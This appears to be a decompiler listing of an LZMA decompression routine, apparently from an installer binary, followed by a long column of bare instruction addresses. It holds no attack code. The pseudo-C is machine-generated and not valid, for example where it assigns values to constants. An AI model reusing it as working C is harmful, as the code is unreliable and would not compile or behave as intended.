											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x00000000
                                                                                                        0x0040676d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
